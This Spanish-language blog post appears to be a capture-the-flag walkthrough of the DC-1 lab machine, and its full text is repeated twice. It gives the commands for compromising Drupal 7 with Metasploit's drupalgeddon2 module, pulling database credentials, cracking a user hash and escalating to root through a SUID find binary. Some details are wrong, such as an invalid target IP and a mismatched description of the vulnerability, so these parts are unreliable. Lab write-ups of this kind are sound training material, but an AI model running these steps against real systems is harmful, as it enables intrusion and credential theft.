Por: Hack1kde
Hola mis amigos de hacking team, en este post les compartire Como se los prometi y donde les iva a mostrar paso a paso como conseguir Las 5 banderas o flags. fue muy divertido resolver este reto, basado en un escenario real tambien dentro de lo que puede ser algo basico en este tipo de maquinas. como lo es la DC-1, ya que nos permite en cada escenario entender algo nuevo y practico como por ejemplo: entrar en una base de datos de un drupal y obtener la tabla de la base de datos del users en modo de cifrado (hash) entre otros escenarios que se nos iran presentando a lo largo de este dasafio, que espero que difruten de manera satisfactoria. y donde quiero aprovechar y dedicarle a mi buen amigo, y uno de mis mejores amigos y hermano del haking team y fundador de este maravilloso equipo de hacking team.
mi amigo y un hermano anonsec77;
Tambien queria agradecer a los admin que componen el grupo por su valioso apoyo que nos an mantenido con el equipo constantemente, en esta bonita experiencia en el mundo del haking y tambien agradecer a todos aquellos fieles seguidores de hacking team, que estan dia dia con nosotros.
@Mr.white
@Kaans
@V1K1NGO
Bueno ahora empecemos para no seguir alargando mas este post.
Paso 1#
Lo primero que debemos hacer es dirigirnos a la pagina de vulhub y donde descargaremos la maquina con la cual vamos a jugar. pulsar aqui para ir a la pagina donde vamos a descargar nuestra maquina.
les dejo capture.
Paso 2#
Ahora si vamos a nuestra terminal de kali linux o cualquier otra distro de su preferencia, y lo primero que vamos hacer, es un escaneo de las redes que tenemos en nuetra interfas.
y como el siguinte comando que nos ayudara a descrubrir tanto redes activas como pasivas para el reconocimiento de direccones ip.
vamos con el siguiente comando.
Comando a utilizar:
root@hack1kde:~# netdiscover
Donde nos aparecera el siguiente resultado, y donde les dejo señalado en circulos el nombre que puede aparecer de su maquina para que puedan identificarla con mejor facilidad donde la ip que nos arroja es la 192.168.1.65
en su caso puede varia el nombre.
Capture:
Paso 3#
Y si quieren asegurarse de que sea la correcta hacemos el siguiente escaneo de con Nmap, de la siguiente forma como ejemplo si mi ip es 192.168.1.72, le voy quitar los dos ultimos octetos de nuestra ip de la maquina atacante y le colocamos * ya que esto nos permitira escanear solo las redes que tenemos en nuestra red de manera sencilla. y nos quedaria asi. 192.168.1.*
Comando a utilizar:
root@hack1kde:~# nmap 192.168.1.*
Les dejo el resultado del escaneo marcado donde nos aseguramos que es la maquina atacar en nuestro entorno controlado.
Capture:
Paso 4#
Ahora si lo siguiente que vamos hacer es escanear la maquina victima para saber cuales son los puertos abiertos y servicios, para poder identificar el tipo de vulnerabilidad con el siguiente comando.
Comando autilizar:
root@hack1kde:~# nmap -sV -A 192.168.1.65
Y nos da el siguiente resultado donde vemos que nos arroja el puerto 22/tcp como abierto, y el puerto 80/tcp; ya que en este ultimo puerto podemos ver claramente la version que esta corriendo. donde podemos ver que es un (Drupal 7)
Capture:
Paso 5#
Como podemos ver el resultado de nuestra capture, lo siguiente sera ir a nuestra terminal y abrir metasploit donde con el siguiente comando, iniciaremos la busqueda de un exploit que nos ayude a explotar la version del drupal que tiene la maquina victima alojada en este desafio.
¿que un drupal? es un sistema libre multipropositos y muy configurable que permite publicar articulos e imagenes que parte tambien ofrece posibilidades de otro servicio.
¿En que afecta?
En concreto esta vulnerabilidad afecta a la API que verifica y parsea las consultas de la base de datos, lo que podría permitir mediante inyección SQL una elevación de privilegios, ejecución arbitraria de código php u otros ataques.
Comando a utilizar:
msf5 > search drupal
Este es el resultado de la busqueda donde nos aparecen varias opciones de las cuales una de ellas nos funcionara ya que la indicada seria esta, YA que se las dejo marcada en la capture de pantalla y la que vamos a utilizar para explotar esta vulnerabilidad.¡¡¡
Capture:
Lo siguiente que vamos hacer, es darle uso al exploit que nos ayudara a explotar el drupal.
Comando a utilizar:
1)
msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
Ahora vamos a utilizar el siguiente comando para ver las opciones que nos da. con el comando show options donde nos muestra que el puerto 80 lo usa por defecto, ya que solo debemos colocar la ip de la maquina victima.
2)
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > show options
Ahora vamos a setiar la ip de la maquina que vamos atacar, donde indicamos el RHOSTS + la ip de la maquina. de la siguiente forma.
3)
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 912.168.1.65
Y lo siguinete sera lanzar el exploit
4)
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
Ya con esto deberiamos tener una session de meterpreter abierta, si hicimos los pasos correctamente como se muestra en la siguiente capture.
Paso 6#
Bueno ya teniendo todo bien aqui, lo siguiente que haremos sera un ls para listar el contenido y poder ver mejor, que nos podemos encontrar en meterpreter ya revisando bien este desafio.
meterpreter > ls
y este seria el resultado del ls optenido, donde vemos la primera flag en la capture a continuacion.
Capture:
Paso 7#
Ahora dentro del mismo resultado del ls hay varias opciones entre ellas esta (site) ya que revisandola me llamo mucho la atencion donde decidi seleccionarla con el comando cd, ya que la que mas me llamo la atencion despues de revisar varias. seleccione esa
meterpreter > cd sites
Ahora haremos un ls para ver el contenido de site donde podemos ver que hay otras opciones que nos pueden servir, y una de ellas seria defaulf la cual vamos a seleccionar:
meterpreter > cd defaulf
Ahora hacemos otro ls para ver el contenido de defaulf y ver que nos puede servir entre las opciones que trae. ya que vemos que la mas interezante seria settings.php en la cual vamos a utilizar el comando cat que nos permitira ver este archivo de texto, ya que no es un directorio.
meterpreter > cat settings.php
Donde podemos ver el siguiente resultado en el capture de pantalla donde nos da como resultado la segunda flag2 que seria un password como lo veremos en la siguiente capture:
Paso 8#
El siguiente paso seria crear una shell en meterpreter
meterpreter > shell
Y ahora procederemos a crear un shell en python que nos permita acceder al base de datos del drupal con el siguiente comando.
Comado a utilizar:
python -c 'import pty; pty.spawn("/bin/sh")'
ahora procederemos a entrar a la base de datos de mysql la cual nos pedira una contraseña, y colocaremos la encontramos en la segunda flag para que esta nos de acceso a la base de datos. escribiendo el siguiente comando.
$ mysql -u dbuser -p
Y obtenemos un resultado donde nos da la bienvenida aceptando el password introducido anteriormente. que seria este R0ck3t donde procedera a darnos la bienvendad.
Paso 9#
Ahora colocamos el comando show databases; ya que nos permitira mostrar resultado del drupaldb que se encuentra en la base de datos escribimos el siguiente comando:
mysql> show databases;
Donde nos da el siguiente resultado mostrando la databases del drupal, como lo muestra en la imagen.
Ahora vamos a darle uso a la opcion drupaldb para que se nos cargue toda la informacion del drupaldb de la siguiente manera.
mysql> use drupaldb
y nos cargara la base de datos para luego usar e siguiente comando que nos permitira ver las occiones de la tabla de la base de datos escribiendo el siguiente comando:
mysql> show tables;
para dar paso a mostrar las occiones de la tabla como se muestra a continuacion del capture:
Paso 10#
Ahora procederemos a seleccionar el users con el siguiente comando:
mysql> select * from users;
ya que esto nos permitira seleccionar y ubicar el usuario en la tabla donde se encuentra el drupal, dandonos como resultado un users cifrado con un hash.
capture:
Este hash $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR
lo vamos a copiar y pegar en el editor y lo guardamos como hash.txt para luego desifrarlo con hashcat o otro tipo de herramienta que sean de su preferencia.
comando que pueden usar:
hashcat -m 7900 hash.txt --force --show /usr/share/wordlists/rockyou.txt
Y vemos que el resultado del hash es: 53cr3t
Paso 11#
Ahora nos salimos de la base de datos de mysql y escribimos exit para poder salir. y con el siguiente comando vamos buscar en el directorio del archivo /dev/null "ya que este tipo de archivo, no es un archivo ordinario al que puedes abrir con facilidad" el siguiente comando seria:
$ find / -perm -u=s -type f 2>/dev/null
Paso 12#
Ahora vamos hacerle un cat al archivo /etc/passwd, ya que La primera fila nos indica la entrada por defecto para el usuario "root"; el usuario principal de nuestro sistema que puede realizar cualquier tipo de operaciones. ... GroupID, es un número entero que representa al grupo que pertenece este usuario. Nombre descriptivo del usuario.
$ cat /etc/passwd
Y ahora como pueden ver hemos conseguido la cuarta flag, que se la marque ya que esta en lo ultimo. debajo del capture:
Paso 13#
Ahora vamos con el siguiente comando, vamos a crearnos como usuario root.
$ find / -name hack1kde -exec cat {} \;
si ya somos root vamos a comprobarlo con el siguiente comando para poder ejecutar. whoami y saber si ya somos root.
$ find . -exec '/bin/sh' \;
Ahora si vamos a comprobar con el comando whoami para ver si ya somos root y ver donde esta nuestra ultima flag.
# whoami
Paso 14#
En este ultimo lo siguiente que debemos hacer es retroceder tres pasos hacia tras conn el comando cd .. para llegar a la ruta de root y poder seleccionarla como se muestra en la captura de pantalla....
Ya estando hasta este punto lo ultimo que debemos hacer despues de haber selecionado con el comando cd root, haremos un ls para listar su contenido. donde por ultimo podemos ver en el capture la paralabra thefinalflag.txt donde hacemos para finalizarconn el comando cat para visualizar el el archivo txt donde nos muestra el siguiente mensaje que nos dice:
Bueno mis amigos espero que hayan
difrutado de este post, donde seguiremos haciendo mas desafios como estos donde veremos cosas interezantes, tambien puede ver el video se los dejo aqui
Hola mis amigos de hacking team, en este post les compartire Como se los prometi y donde les iva a mostrar paso a paso como conseguir Las 5 banderas o flags. fue muy divertido resolver este reto, basado en un escenario real tambien dentro de lo que puede ser algo basico en este tipo de maquinas. como lo es la DC-1, ya que nos permite en cada escenario entender algo nuevo y practico como por ejemplo: entrar en una base de datos de un drupal y obtener la tabla de la base de datos del users en modo de cifrado (hash) entre otros escenarios que se nos iran presentando a lo largo de este dasafio, que espero que difruten de manera satisfactoria. y donde quiero aprovechar y dedicarle a mi buen amigo, y uno de mis mejores amigos y hermano del haking team y fundador de este maravilloso equipo de hacking team.
mi amigo y un hermano anonsec77;
Tambien queria agradecer a los admin que componen el grupo por su valioso apoyo que nos an mantenido con el equipo constantemente, en esta bonita experiencia en el mundo del haking y tambien agradecer a todos aquellos fieles seguidores de hacking team, que estan dia dia con nosotros.
@Mr.white
@Kaans
@V1K1NGO
Bueno ahora empecemos para no seguir alargando mas este post.
Paso 1#
Lo primero que debemos hacer es dirigirnos a la pagina de vulhub y donde descargaremos la maquina con la cual vamos a jugar. pulsar aqui para ir a la pagina donde vamos a descargar nuestra maquina.
les dejo capture.
Paso 2#
Ahora si vamos a nuestra terminal de kali linux o cualquier otra distro de su preferencia, y lo primero que vamos hacer, es un escaneo de las redes que tenemos en nuetra interfas.
y como el siguinte comando que nos ayudara a descrubrir tanto redes activas como pasivas para el reconocimiento de direccones ip.
vamos con el siguiente comando.
Comando a utilizar:
root@hack1kde:~# netdiscover
Donde nos aparecera el siguiente resultado, y donde les dejo señalado en circulos el nombre que puede aparecer de su maquina para que puedan identificarla con mejor facilidad donde la ip que nos arroja es la 192.168.1.65
en su caso puede varia el nombre.
Capture:
Paso 3#
Y si quieren asegurarse de que sea la correcta hacemos el siguiente escaneo de con Nmap, de la siguiente forma como ejemplo si mi ip es 192.168.1.72, le voy quitar los dos ultimos octetos de nuestra ip de la maquina atacante y le colocamos * ya que esto nos permitira escanear solo las redes que tenemos en nuestra red de manera sencilla. y nos quedaria asi. 192.168.1.*
Comando a utilizar:
root@hack1kde:~# nmap 192.168.1.*
Les dejo el resultado del escaneo marcado donde nos aseguramos que es la maquina atacar en nuestro entorno controlado.
Capture:
Paso 4#
Ahora si lo siguiente que vamos hacer es escanear la maquina victima para saber cuales son los puertos abiertos y servicios, para poder identificar el tipo de vulnerabilidad con el siguiente comando.
Comando autilizar:
root@hack1kde:~# nmap -sV -A 192.168.1.65
Y nos da el siguiente resultado donde vemos que nos arroja el puerto 22/tcp como abierto, y el puerto 80/tcp; ya que en este ultimo puerto podemos ver claramente la version que esta corriendo. donde podemos ver que es un (Drupal 7)
Capture:
Paso 5#
Como podemos ver el resultado de nuestra capture, lo siguiente sera ir a nuestra terminal y abrir metasploit donde con el siguiente comando, iniciaremos la busqueda de un exploit que nos ayude a explotar la version del drupal que tiene la maquina victima alojada en este desafio.
¿que un drupal? es un sistema libre multipropositos y muy configurable que permite publicar articulos e imagenes que parte tambien ofrece posibilidades de otro servicio.
¿En que afecta?
En concreto esta vulnerabilidad afecta a la API que verifica y parsea las consultas de la base de datos, lo que podría permitir mediante inyección SQL una elevación de privilegios, ejecución arbitraria de código php u otros ataques.
Comando a utilizar:
msf5 > search drupal
Este es el resultado de la busqueda donde nos aparecen varias opciones de las cuales una de ellas nos funcionara ya que la indicada seria esta, YA que se las dejo marcada en la capture de pantalla y la que vamos a utilizar para explotar esta vulnerabilidad.¡¡¡
Capture:
Lo siguiente que vamos hacer, es darle uso al exploit que nos ayudara a explotar el drupal.
Comando a utilizar:
1)
msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
Ahora vamos a utilizar el siguiente comando para ver las opciones que nos da. con el comando show options donde nos muestra que el puerto 80 lo usa por defecto, ya que solo debemos colocar la ip de la maquina victima.
2)
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > show options
Ahora vamos a setiar la ip de la maquina que vamos atacar, donde indicamos el RHOSTS + la ip de la maquina. de la siguiente forma.
3)
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 912.168.1.65
Y lo siguinete sera lanzar el exploit
4)
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
Ya con esto deberiamos tener una session de meterpreter abierta, si hicimos los pasos correctamente como se muestra en la siguiente capture.
Paso 6#
Bueno ya teniendo todo bien aqui, lo siguiente que haremos sera un ls para listar el contenido y poder ver mejor, que nos podemos encontrar en meterpreter ya revisando bien este desafio.
meterpreter > ls
y este seria el resultado del ls optenido, donde vemos la primera flag en la capture a continuacion.
Capture:
Paso 7#
Ahora dentro del mismo resultado del ls hay varias opciones entre ellas esta (site) ya que revisandola me llamo mucho la atencion donde decidi seleccionarla con el comando cd, ya que la que mas me llamo la atencion despues de revisar varias. seleccione esa
meterpreter > cd sites
Ahora haremos un ls para ver el contenido de site donde podemos ver que hay otras opciones que nos pueden servir, y una de ellas seria defaulf la cual vamos a seleccionar:
meterpreter > cd defaulf
Ahora hacemos otro ls para ver el contenido de defaulf y ver que nos puede servir entre las opciones que trae. ya que vemos que la mas interezante seria settings.php en la cual vamos a utilizar el comando cat que nos permitira ver este archivo de texto, ya que no es un directorio.
meterpreter > cat settings.php
Donde podemos ver el siguiente resultado en el capture de pantalla donde nos da como resultado la segunda flag2 que seria un password como lo veremos en la siguiente capture:
Paso 8#
El siguiente paso seria crear una shell en meterpreter
meterpreter > shell
Y ahora procederemos a crear un shell en python que nos permita acceder al base de datos del drupal con el siguiente comando.
Comado a utilizar:
python -c 'import pty; pty.spawn("/bin/sh")'
ahora procederemos a entrar a la base de datos de mysql la cual nos pedira una contraseña, y colocaremos la encontramos en la segunda flag para que esta nos de acceso a la base de datos. escribiendo el siguiente comando.
$ mysql -u dbuser -p
Y obtenemos un resultado donde nos da la bienvenida aceptando el password introducido anteriormente. que seria este R0ck3t donde procedera a darnos la bienvendad.
Paso 9#
Ahora colocamos el comando show databases; ya que nos permitira mostrar resultado del drupaldb que se encuentra en la base de datos escribimos el siguiente comando:
mysql> show databases;
Donde nos da el siguiente resultado mostrando la databases del drupal, como lo muestra en la imagen.
Ahora vamos a darle uso a la opcion drupaldb para que se nos cargue toda la informacion del drupaldb de la siguiente manera.
mysql> use drupaldb
y nos cargara la base de datos para luego usar e siguiente comando que nos permitira ver las occiones de la tabla de la base de datos escribiendo el siguiente comando:
mysql> show tables;
para dar paso a mostrar las occiones de la tabla como se muestra a continuacion del capture:
Paso 10#
Ahora procederemos a seleccionar el users con el siguiente comando:
mysql> select * from users;
ya que esto nos permitira seleccionar y ubicar el usuario en la tabla donde se encuentra el drupal, dandonos como resultado un users cifrado con un hash.
capture:
Este hash $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR
lo vamos a copiar y pegar en el editor y lo guardamos como hash.txt para luego desifrarlo con hashcat o otro tipo de herramienta que sean de su preferencia.
comando que pueden usar:
hashcat -m 7900 hash.txt --force --show /usr/share/wordlists/rockyou.txt
Y vemos que el resultado del hash es: 53cr3t
Paso 11#
Ahora nos salimos de la base de datos de mysql y escribimos exit para poder salir. y con el siguiente comando vamos buscar en el directorio del archivo /dev/null "ya que este tipo de archivo, no es un archivo ordinario al que puedes abrir con facilidad" el siguiente comando seria:
$ find / -perm -u=s -type f 2>/dev/null
Paso 12#
Ahora vamos hacerle un cat al archivo /etc/passwd, ya que La primera fila nos indica la entrada por defecto para el usuario "root"; el usuario principal de nuestro sistema que puede realizar cualquier tipo de operaciones. ... GroupID, es un número entero que representa al grupo que pertenece este usuario. Nombre descriptivo del usuario.
$ cat /etc/passwd
Y ahora como pueden ver hemos conseguido la cuarta flag, que se la marque ya que esta en lo ultimo. debajo del capture:
Paso 13#
Ahora vamos con el siguiente comando, vamos a crearnos como usuario root.
$ find / -name hack1kde -exec cat {} \;
si ya somos root vamos a comprobarlo con el siguiente comando para poder ejecutar. whoami y saber si ya somos root.
$ find . -exec '/bin/sh' \;
Ahora si vamos a comprobar con el comando whoami para ver si ya somos root y ver donde esta nuestra ultima flag.
# whoami
Paso 14#
En este ultimo lo siguiente que debemos hacer es retroceder tres pasos hacia tras conn el comando cd .. para llegar a la ruta de root y poder seleccionarla como se muestra en la captura de pantalla....
Ya estando hasta este punto lo ultimo que debemos hacer despues de haber selecionado con el comando cd root, haremos un ls para listar su contenido. donde por ultimo podemos ver en el capture la paralabra thefinalflag.txt donde hacemos para finalizarconn el comando cat para visualizar el el archivo txt donde nos muestra el siguiente mensaje que nos dice:
bien hecho
espero que hayas disfrutado esto y hayas aprendido nuevas habilidades.......
Bueno mis amigos espero que hayan
difrutado de este post, donde seguiremos haciendo mas desafios como estos donde veremos cosas interezantes, tambien puede ver el video se los dejo aqui
GRANDE
ResponderEliminar